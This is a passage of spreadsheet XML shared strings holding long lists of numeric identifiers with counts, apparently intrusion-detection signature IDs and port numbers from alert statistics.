2101023 (1), 2101487 (1), 2102073 (1), 2102131 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2101110 (1), 2002133 (1), 2017436 (1)</t>
  </si>
  <si>
    <t>41742, 41188, 2009885, 12, 1122, 2049400, 2101122, 2003099, 1560, 2565, 2016141, 1301, 1142, 1288, 2101288, 2009362, 882, 2009361, 2027250, 2017442, 2152, 1245, 41187, 1147, 2101245, 2027265, 42289, 2019526, 1774, 977, 1998, 1385, 1043, 2100987, 2100977, 1044, 1125, 1286, 2077, 43356, 1213, 2017440, 1875, 14, 928, 1564, 1500, 1637, 1129, 1880, 962, 1826, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 40353, 908, 2410, 2101129, 2100937, 2101201, 1242, 1848, 911, 49920, 1013, 1556, 2101242, 2027263, 2027253, 2101013, 2009884, 1131, 1130, 971, 1145, 1172, 24342, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1231, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 17387, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1523, 895, 21515, 2393, 2295, 2002752, 2002749, 2027262, 2018752, 2100971, 2101145, 2010767, 2010766, 2101016, 2101877, 2009485, 2101156, 2100884, 2017441, 43238, 1852, 40880, 913, 914, 912, 985, 853, 8492, 43808, 999, 1486, 857, 3201, 986, 1482, 1568, 1772, 1128, 1076, 53017, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 8493, 1517, 2154, 1224, 1611, 2000, 1157, 1767, 2347, 2346, 1659, 910, 1722, 1108, 8490, 915, 1163, 2060, 1173, 1544, 936, 1230, 1743, 1540, 2138, 1168, 1407, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 41189, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 818, 1032, 1033, 1034, 1035, 1036, 2142, 1527, 1526, 902, 1520, 1209, 1770, 1769, 33613, 33612, 1004, 19, 2276, 21516, 20631, 20633, 20815, 1671, 2363, 2285, 2140, 886, 2281, 2288, 2298, 23362, 43285, 2101852, 2019714, 2014379, 2011031, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2101023, 2101487, 2102073, 2102131, 2049402, 2101874, 2100953, 2100951, 2100959, 2101110, 2002133, 2017436</t>
  </si>
  <si>
    <t>1122 (150), 1560 (71), 2565 (39), 1301 (26), 1142 (26), 1288 (24), 882 (23), 2152 (14), 1245 (13), 1147 (13), 1774 (10), 977 (9), 1998 (9), 1385 (8), 1043 (8), 1044 (7), 1125 (6), 1286 (6), 2077 (6), 1213 (6), 1875 (5), 928 (5), 1564 (5), 1500 (5), 1637 (5), 1129 (4), 1880 (4), 962 (4), 1826 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 908 (4), 2410 (4), 1242 (3), 1848 (3), 911 (3), 1013 (3), 1556 (3), 1131 (2), 1130 (2), 971 (2), 1145 (2), 1172 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1231 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1523 (2), 895 (2), 2393 (2), 2295 (2), 1852 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 999 (1), 1000 (1), 1486 (1), 857 (1), 3201 (1), 986 (1), 1482 (1), 1568 (1), 1772 (1), 1128 (1), 1076 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 1517 (1), 2154 (1), 1224 (1), 1611 (1), 2000 (1), 1157 (1), 1767 (1), 2347 (1), 2346 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 915 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 1004 (1), 2276 (1), 1671 (1), 2363 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 43285 (1)</t>
  </si>
  <si>
    <t>1122, 1560, 2565, 1301, 1142, 1288, 882, 2152, 1245, 1147, 1774, 977, 1998, 1385, 1043, 1044, 1125, 1286, 2077, 1213, 1875, 928, 1564, 1500, 1637, 1129, 1880, 962, 1826, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 908, 2410, 1242, 1848, 911, 1013, 1556, 1131, 1130, 971, 1145, 1172, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1231, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1523, 895, 2393, 2295, 1852, 913, 914, 912, 985, 853, 999, 1000, 1486, 857, 3201, 986, 1482, 1568, 1772, 1128, 1076, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 1517, 2154, 1224, 1611, 2000, 1157, 1767, 2347, 2346, 1659, 910, 1722, 1108, 915, 1163, 2060, 1173, 1544, 936, 1230, 1743, 1540, 2138, 1168, 1407, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 818, 1032, 1033, 1034, 1035, 1036, 2142, 1527, 1526, 902, 1520, 1209, 1770, 1769, 1004, 2276, 1671, 2363, 2285, 2140, 886, 2281, 2288, 2298, 43285</t>
  </si>
  <si>
    <t>12 (166), 2049400 (150), 1122 (150), 1560 (71), 2016141 (39), 2565 (39), 1301 (26), 1142 (26), 2009362 (24), 1288 (24), 2009361 (23), 882 (23), 2027250 (17), 2017442 (17), 2152 (14), 2101245 (13), 1245 (13), 1147 (13), 2027265 (12), 2019526 (11), 1774 (10), 977 (9), 1998 (9), 2100987 (8), 2100977 (8), 1385 (8), 1043 (8), 1044 (7), 2017440 (6), 1125 (6), 1286 (6), 2077 (6), 1213 (6), 14 (5), 1875 (5), 928 (5), 1564 (5), 1500 (5), 1637 (5), 2101129 (4), 2101201 (4), 1129 (4), 1880 (4), 962 (4), 1826 (4), 930 (4), 1141 (4), 937 (4), 1201 (4), 1997 (4), 879 (4), 950 (4), 1542 (4), 944 (4), 943 (4), 1005 (4), 908 (4), 2410 (4), 2101242 (3), 2027263 (3), 2027253 (3), 2101013 (3), 1242 (3), 1848 (3), 911 (3), 1013 (3), 1556 (3), 24342 (2), 2027262 (2), 2018752 (2), 2101145 (2), 2010766 (2), 2101016 (2), 2101877 (2), 2009485 (2), 2017441 (2), 1131 (2), 1130 (2), 971 (2), 1145 (2), 1172 (2), 1016 (2), 2076 (2), 1493 (2), 1148 (2), 1166 (2), 1765 (2), 903 (2), 1773 (2), 1231 (2), 1877 (2), 1212 (2), 940 (2), 1248 (2), 1175 (2), 932 (2), 1214 (2), 946 (2), 851 (2), 2144 (2), 43289 (2), 1037 (2), 1156 (2), 1119 (2), 1120 (2), 1816 (2), 1165 (2), 1614 (2), 1871 (2), 954 (2), 1031 (2), 2198 (2), 1557 (2), 1555 (2), 1873 (2), 1523 (2), 895 (2), 2393 (2), 2295 (2), 19 (1), 21516 (1), 2019714 (1), 2049401 (1), 2101108 (1), 2100952 (1), 2100958 (1), 2100961 (1), 2100965 (1), 2011141 (1), 2011144 (1), 2011142 (1), 2011143 (1), 2101487 (1), 2102073 (1), 2049402 (1), 2101874 (1), 2100953 (1), 2100951 (1), 2100959 (1), 2017436 (1), 1852 (1), 913 (1), 914 (1), 912 (1), 985 (1), 853 (1), 999 (1), 1000 (1), 1486 (1), 857 (1), 3201 (1), 986 (1), 1482 (1), 1568 (1), 1772 (1), 1128 (1), 1076 (1), 1146 (1), 1660 (1), 1528 (1), 1164 (1), 2484 (1), 1551 (1), 1150 (1), 1576 (1), 1152 (1), 1580 (1), 1153 (1), 1154 (1), 2062 (1), 1586 (1), 1577 (1), 1578 (1), 1579 (1), 931 (1), 2246 (1), 1587 (1), 992 (1), 875 (1), 1829 (1), 906 (1), 1517 (1), 2154 (1), 1224 (1), 1611 (1), 2000 (1), 1157 (1), 1767 (1), 2347 (1), 2346 (1), 1659 (1), 910 (1), 1722 (1), 1108 (1), 915 (1), 1163 (1), 2060 (1), 1173 (1), 1544 (1), 936 (1), 1230 (1), 1743 (1), 1540 (1), 2138 (1), 1168 (1), 1407 (1), 1726 (1), 939 (1), 952 (1), 967 (1), 955 (1), 958 (1), 961 (1), 965 (1), 1847 (1), 1111 (1), 1592 (1), 43290 (1), 1481 (1), 1521 (1), 1123 (1), 1183 (1), 1160 (1), 807 (1), 1023 (1), 1024 (1), 1487 (1), 2325 (1), 1162 (1), 1134 (1), 904 (1), 907 (1), 905 (1), 1215 (1), 1192 (1), 1155 (1), 1161 (1), 1202 (1), 1030 (1), 1040 (1), 887 (1), 878 (1), 1038 (1), 1022 (1), 1077 (1), 1078 (1), 1075 (1), 984 (1), 1073 (1), 1127 (1), 844 (1), 1585 (1), 1584 (1), 1582 (1), 1151 (1), 1575 (1), 1583 (1), 1581 (1), 2148 (1), 2151 (1), 1458 (1), 2137 (1), 2397 (1), 1525 (1), 2215 (1), 2223 (1), 1787 (1), 1724 (1), 1723 (1), 2204 (1), 2205 (1), 2206 (1), 2073 (1), 2225 (1), 2130 (1), 2131 (1), 2214 (1), 2086 (1), 2085 (1), 2219 (1), 2133 (1), 1872 (1), 1874 (1), 839 (1), 941 (1), 945 (1), 980 (1), 942 (1), 947 (1), 968 (1), 956 (1), 949 (1), 957 (1), 990 (1), 953 (1), 951 (1), 959 (1), 964 (1), 2447 (1), 1070 (1), 1559 (1), 2395 (1), 2326 (1), 2196 (1), 948 (1), 1851 (1), 1110 (1), 818 (1), 1032 (1), 1033 (1), 1034 (1), 1035 (1), 1036 (1), 2142 (1), 1527 (1), 1526 (1), 902 (1), 1520 (1), 1209 (1), 1770 (1), 1769 (1), 1004 (1), 2276 (1), 1671 (1), 2363 (1), 2285 (1), 2140 (1), 886 (1), 2281 (1), 2288 (1), 2298 (1), 43285 (1)</t>
  </si>
  <si>
    <t>12, 2049400, 1122, 1560, 2016141, 2565, 1301, 1142, 2009362, 1288, 2009361, 882, 2027250, 2017442, 2152, 2101245, 1245, 1147, 2027265, 2019526, 1774, 977, 1998, 2100987, 2100977, 1385, 1043, 1044, 2017440, 1125, 1286, 2077, 1213, 14, 1875, 928, 1564, 1500, 1637, 2101129, 2101201, 1129, 1880, 962, 1826, 930, 1141, 937, 1201, 1997, 879, 950, 1542, 944, 943, 1005, 908, 2410, 2101242, 2027263, 2027253, 2101013, 1242, 1848, 911, 1013, 1556, 24342, 2027262, 2018752, 2101145, 2010766, 2101016, 2101877, 2009485, 2017441, 1131, 1130, 971, 1145, 1172, 1016, 2076, 1493, 1148, 1166, 1765, 903, 1773, 1231, 1877, 1212, 940, 1248, 1175, 932, 1214, 946, 851, 2144, 43289, 1037, 1156, 1119, 1120, 1816, 1165, 1614, 1871, 954, 1031, 2198, 1557, 1555, 1873, 1523, 895, 2393, 2295, 19, 21516, 2019714, 2049401, 2101108, 2100952, 2100958, 2100961, 2100965, 2011141, 2011144, 2011142, 2011143, 2101487, 2102073, 2049402, 2101874, 2100953, 2100951, 2100959, 2017436, 1852, 913, 914, 912, 985, 853, 999, 1000, 1486, 857, 3201, 986, 1482, 1568, 1772, 1128, 1076, 1146, 1660, 1528, 1164, 2484, 1551, 1150, 1576, 1152, 1580, 1153, 1154, 2062, 1586, 1577, 1578, 1579, 931, 2246, 1587, 992, 875, 1829, 906, 1517, 2154, 1224, 1611, 2000, 1157, 1767, 2347, 2346, 1659, 910, 1722, 1108, 915, 1163, 2060, 1173, 1544, 936, 1230, 1743, 1540, 2138, 1168, 1407, 1726, 939, 952, 967, 955, 958, 961, 965, 1847, 1111, 1592, 43290, 1481, 1521, 1123, 1183, 1160, 807, 1023, 1024, 1487, 2325, 1162, 1134, 904, 907, 905, 1215, 1192, 1155, 1161, 1202, 1030, 1040, 887, 878, 1038, 1022, 1077, 1078, 1075, 984, 1073, 1127, 844, 1585, 1584, 1582, 1151, 1575, 1583, 1581, 2148, 2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 818, 1032, 1033, 1034, 1035, 1036, 2142, 1527, 1526, 902, 1520, 1209, 1770, 1769, 1004, 2276, 1671, 2363, 2285, 2140, 886, 2281, 2288, 2298, 43285</t>
  </si>
  <si>
    <t>33 (13), 31 (2), 18 (1)</t>
  </si>
  <si>
    <t>33, 31, 18</t>
  </si>
  <si>
    <t>17429 (6005), 33 (13), 987 (8), 31 (2), 18 (1)</t>
  </si>
  <si>
    <t>17429, 33, 987, 31, 18</t>
  </si>
  <si>
    <t>987 (8)</t>
  </si>
  <si>
    <t>987</t>
  </si>
  <si>
    <t>33 (13), 987 (8), 31 (2), 18 (1)</t>
  </si>
  <si>
    <t>33, 987, 31, 18</t>
  </si>
  <si>
    <t>12577</t>
  </si>
  <si>
    <t>17011</t>
  </si>
  <si>
    <t>30510, 30520, 30853, 91328, 92485, 9999</t>
  </si>
  <si>
    <t>30798, 30818, 34200, 36315, 54469, 58461</t>
  </si>
  <si>
    <t>30323, 30514, 30815, 30844, 31477, 32190, 32194, 32622, 32658, 33327, 33330, 33756, 33779, 33783, 34804, 35010, 35107, 35298, 38402, 38531, 39766, 39810, 55558, 55834, 58209, 94328, 94849, 95838</t>
  </si>
  <si>
    <t>30120, 30350, 30444, 30851, 30888, 30903, 30914, 30921, 31476, 31932, 32451, 32672, 32688, 32689, 32691, 32696, 32701, 32703, 32712, 33339, 33467, 33645, 34519, 36096, 36280, 39455, 54701, 58618, 91655</t>
  </si>
  <si>
    <t>30092, 30852, 34439, 36102, 90136</t>
  </si>
  <si>
    <t>webdav</t>
  </si>
  <si>
    <t>50447 (5), 36650 (2), 384 (1), 453 (1), 408 (1), 451 (1), 1421 (1), 1420 (1), 1418 (1), 13586 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>50447, 36650, 384, 453, 408, 451, 1421, 1420, 1418, 13586, 257, 598</t>
  </si>
  <si>
    <t>2009358 (4), 2024364 (4), 2002752 (2), 2002749 (2), 2100469 (1), 2100384 (1), 2009582 (1), 2100453 (1), 2100408 (1), 2100451 (1), 2010937 (1), 2010939 (1), 2010938 (1), 2100615 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2101420 (1), 2101418 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2002752, 2002749, 2100469, 2100384, 2009582, 2100453, 2100408, 2100451, 2010937, 2010939, 2010938, 2100615, 2010936, 2010935, 2002910, 2101420, 2101418, 2100257, 2100598</t>
  </si>
  <si>
    <t>50447 (5), 2009358 (4), 2024364 (4), 36650 (2), 2002752 (2), 2002749 (2), 384 (1), 453 (1), 408 (1), 451 (1), 1421 (1), 1420 (1), 1418 (1), 13586 (1), 257 (1), 598 (1), 2100469 (1), 2100384 (1), 2009582 (1), 2100453 (1), 2100408 (1), 2100451 (1), 2010937 (1), 2010939 (1), 2010938 (1), 2100615 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2101420 (1), 2101418 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>50447, 2009358, 2024364, 36650, 2002752, 2002749, 384, 453, 408, 451, 1421, 1420, 1418, 13586, 257, 598, 2100469, 2100384, 2009582, 2100453, 2100408, 2100451, 2010937, 2010939, 2010938, 2100615, 2010936, 2010935, 2002910, 2101420, 2101418, 2100257, 2100598</t>
  </si>
  <si>
    <t>2009358 (4), 2024364 (4)</t>
  </si>
  <si>
    <t>2009358, 2024364</t>
  </si>
  <si>
    <t>50447 (5)</t>
  </si>
  <si>
    <t>50447 (5), 2009358 (4), 2024364 (4)</t>
  </si>
  <si>
    <t>50447, 2009358, 2024364</t>
  </si>
  <si>
    <t>2010937 (1), 2010939 (1), 2010938 (1), 2002911 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598</t>
  </si>
  <si>
    <t>36650 (2), 1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>36650, 1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2100469 (1), 2009582 (1), 2010937 (1), 2010939 (1), 2010938 (1), 2100615 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2101420 (1), 2101418 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100469, 2009582, 2010937, 2010939, 2010938, 2100615, 2010936, 2010935, 2002910, 2101420, 2101418, 2100257, 2100598</t>
  </si>
  <si>
    <t>36650 (2), 2002752 (2), 2002749 (2), 1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1), 2100469 (1), 2009582 (1), 2010937 (1), 2010939 (1), 2010938 (1), 2100615 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2101420 (1), 2101418 (1), 2100257 (1), 2100598 (1)</t>
  </si>
  <si>
    <t>36650, 2002752, 2002749, 1421, 1420, 1418, 257, 598, 2100469, 2009582, 2010937, 2010939, 2010938, 2100615, 2010936, 2010935, 2002910, 2101420, 2101418, 2100257, 2100598</t>
  </si>
  <si>
    <t>1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <t>2010937 (1), 2010939 (1), 2010938 (1), 2002911 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2100257 (1), 2100598 (1), 1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598, 1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <t>384 (1), 453 (1), 408 (1), 451 (1), 13586 (1)</t>
  </si>
  <si>
    <t>384, 453, 408, 451, 13586</t>
  </si>
  <si>
    <t>2100384 (1), 2100453 (1), 2100408 (1), 2100451 (1)</t>
  </si>
  <si>
    <t>2100384, 2100453, 2100408, 2100451</t>
  </si>
  <si>
    <t>384 (1), 453 (1), 408 (1), 451 (1), 13586 (1), 2100384 (1), 2100453 (1), 2100408 (1), 2100451 (1)</t>
  </si>
  <si>
    <t>384, 453, 408, 451, 13586, 2100384, 2100453, 2100408, 2100451</t>
  </si>
  <si>
    <t>384 (1), 453 (1), 408 (1), 451 (1)</t>
  </si>
  <si>
    <t>384, 453, 408, 451</t>
  </si>
  <si>
    <t>43814, 45360</t>
  </si>
  <si>
    <t>18157</t>
  </si>
  <si>
    <t>10000501</t>
  </si>
  <si>
    <t>31914, 9999</t>
  </si>
  <si>
    <t>94317</t>
  </si>
  <si>
    <t>32796, 58433</t>
  </si>
  <si>
    <t>18 (7), 12 (5), 3 (1)</t>
  </si>
  <si>
    <t>18, 12, 3</t>
  </si>
  <si>
    <t>2018359 (908), 2033952 (454), 2053459 (2), 2035480 (2), 2025644 (2), 2018959 (1)</t>
  </si>
  <si>
    <t>2018359, 2033952, 2053459, 2035480, 2025644, 2018959</t>
  </si>
  <si>
    <t>50447 (908), 1394 (34), 18 (7), 12 (5), 15306 (2), 58160 (2), 3 (1)</t>
  </si>
  <si>
    <t>50447, 1394, 18, 12, 15306, 58160, 3</t>
  </si>
  <si>
    <t>2006409 (908), 2018359 (908), 2033952 (454), 2009080 (3), 2025644 (3), 2002752 (2), 2002749 (2), 2035480 (2), 2009345 (1), 2006402 (1), 2006380 (1), 2009346 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006409, 2018359, 2033952, 2009080, 2025644, 2002752, 2002749, 2035480, 2009345, 2006402, 2006380, 2009346, 2018959</t>
  </si>
  <si>
    <t>50447 (908), 2006409 (908), 2018359 (908), 2033952 (454), 1394 (34), 18 (7), 12 (5), 2009080 (3), 2025644 (3), 15306 (2), 58160 (2), 2002752 (2), 2002749 (2), 2035480 (2), 3 (1), 2009345 (1), 2006402 (1), 2006380 (1), 2009346 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2018359, 2033952, 1394, 18, 12, 2009080, 2025644, 15306, 58160, 2002752, 2002749, 2035480, 3, 2009345, 2006402, 2006380, 2009346, 2018959</t>
  </si>
  <si>
    <t>2033952 (454), 2053459 (2), 2025644 (2), 2018959 (1)</t>
  </si>
  <si>
    <t>2033952, 2053459, 2025644, 2018959</t>
  </si>
  <si>
    <t>50447 (908), 1394 (34), 15306 (2), 58160 (2)</t>
  </si>
  <si>
    <t>50447, 1394, 15306, 58160</t>
  </si>
  <si>
    <t>2006409 (908), 2033952 (454), 2009080 (3), 2025644 (3), 2006402 (1), 2006380 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006409, 2033952, 2009080, 2025644, 2006402, 2006380, 2018959</t>
  </si>
  <si>
    <t>50447 (908), 2006409 (908), 2033952 (454), 1394 (34), 2009080 (3), 2025644 (3), 15306 (2), 58160 (2), 2006402 (1), 2006380 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2033952, 1394, 2009080, 2025644, 15306, 58160, 2006402, 2006380, 2018959</t>
  </si>
  <si>
    <t>2033952 (454), 1394 (34), 2053459 (2), 2025644 (2), 2018959 (1)</t>
  </si>
  <si>
    <t>2033952, 1394, 2053459, 2025644, 2018959</t>
  </si>
  <si>
    <t>2018359 (908)</t>
  </si>
  <si>
    <t>2018359</t>
  </si>
  <si>
    <t>2018359 (908), 12 (5)</t>
  </si>
  <si>
    <t>2018359, 12</t>
  </si>
  <si>
    <t>2018359 (908), 2002752 (2), 2002749 (2), 2009345 (1), 2009346 (1)</t>
  </si>
  <si>
    <t>2018359, 2002752, 2002749, 2009345, 2009346</t>
  </si>
  <si>
    <t>2018359 (908), 12 (5), 2002752 (2), 2002749 (2), 2009345 (1), 2009346 (1)</t>
  </si>
  <si>
    <t>2018359, 12, 2002752, 2002749, 2009345, 2009346</t>
  </si>
  <si>
    <t>18 (7), 3 (1)</t>
  </si>
  <si>
    <t>18 (7), 2035480 (2), 3 (1)</t>
  </si>
  <si>
    <t>18, 2035480, 3</t>
  </si>
  <si>
    <t>46002</t>
  </si>
  <si>
    <t>2100472 (6), 2002752 (3), 2002749 (3), 2003303 (1), 2003410 (1), 2015016 (1)</t>
  </si>
  <si>
    <t>2100472, 2002752, 2002749, 2003303, 2003410, 2015016</t>
  </si>
  <si>
    <t>2100472 (6), 2002752 (3), 2002749 (3), 12 (2), 2003303 (1), 2003410 (1), 2015016 (1)</t>
  </si>
  <si>
    <t>2100472, 2002752, 2002749, 12, 2003303, 2003410, 2015016</t>
  </si>
  <si>
    <t>2100472 (6), 2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>2100472, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100472 (6), 2002752 (3), 2002749 (3), 12 (2)</t>
  </si>
  <si>
    <t>2100472, 2002752, 2002749, 12</t>
  </si>
  <si>
    <t>2003303 (1), 2003410 (1), 2015016 (1)</t>
  </si>
  <si>
    <t>2100384 (16), 2100408 (16), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2100384, 2100408, 2002752, 2002749</t>
  </si>
  <si>
    <t>29456 (16), 31767 (16)</t>
  </si>
  <si>
    <t>29456, 31767</t>
  </si>
  <si>
    <t>29456 (16), 31767 (16), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>29456, 31767, 2002752, 2002749</t>
  </si>
  <si>
    <t>29456 (16)</t>
  </si>
  <si>
    <t>29456</t>
  </si>
  <si>
    <t>384 (16), 408 (16)</t>
  </si>
  <si>
    <t>384, 408</t>
  </si>
  <si>
    <t>2100384 (16), 2100408 (16)</t>
  </si>
  <si>
    <t>2100384, 2100408</t>
  </si>
  <si>
    <t>384 (16), 408 (16), 2100384 (16), 2100408 (16)</t>
  </si>
  <si>
    <t>384, 408, 2100384, 2100408</t>
  </si>
  <si>
    <t>24466</t>
  </si>
  <si>
    <t>2043217 (11), 2034567 (1), 2013028 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>2043217, 2034567, 2013028, 2019240</t>
  </si>
  <si>
    <t>50447 (12), 23861 (6), 648 (3), 28 (1), 17458 (1), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>50447, 23861, 648, 28, 17458, 1200, 1390</t>
  </si>
  <si>
    <t>2006409 (12), 2060251 (11), 2043217 (11), 2002752 (4), 2002749 (4), 2060252 (3), 2101390 (2), 2034567 (1), 2013028 (1), 2002824 (1), 2019240 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>2006409, 2060251, 2043217, 2002752, 2002749, 2060252, 2101390, 2034567, 2013028, 2002824, 2019240, 2101200</t>
  </si>
  <si>
    <t>648 (3), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>648, 1200, 1390</t>
  </si>
  <si>
    <t>2043217 (11), 2019240 (1)</t>
  </si>
  <si>
    <t>2043217, 2019240</t>
  </si>
  <si>
    <t>50447 (12), 23861 (6), 648 (3), 17458 (1), 1390 (1)</t>
  </si>
  <si>
    <t>50447, 23861, 648, 17458, 1390</t>
  </si>
  <si>
    <t>2006409 (12), 2043217 (11), 2101390 (2), 2019240 (1)</t>
  </si>
  <si>
    <t>2006409, 2043217, 2101390, 2019240</t>
  </si>
  <si>
    <t>50447 (12), 2006409 (12), 2043217 (11), 23861 (6), 648 (3), 2101390 (2), 17458 (1), 1390 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2043217, 23861, 648, 2101390, 17458, 1390, 2019240</t>
  </si>
  <si>
    <t>648 (3), 1390 (1)</t>
  </si>
  <si>
    <t>648, 1390</t>
  </si>
